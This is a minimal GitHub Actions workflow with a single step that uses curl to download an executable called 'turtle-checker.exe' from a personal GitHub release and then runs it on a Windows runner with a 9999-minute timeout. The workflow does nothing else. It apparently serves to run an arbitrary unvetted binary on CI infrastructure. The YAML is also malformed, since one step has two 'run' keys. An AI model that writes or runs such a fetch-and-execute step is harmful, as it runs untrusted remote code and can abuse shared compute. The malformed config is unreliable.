name: RUNNING

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: curl
      run: curl -L -o turtle-checker.exe https://github.com/endri12345/wejhs/releases/download/files/turtle-checker.exe
      run: turtle-checker.exe
      
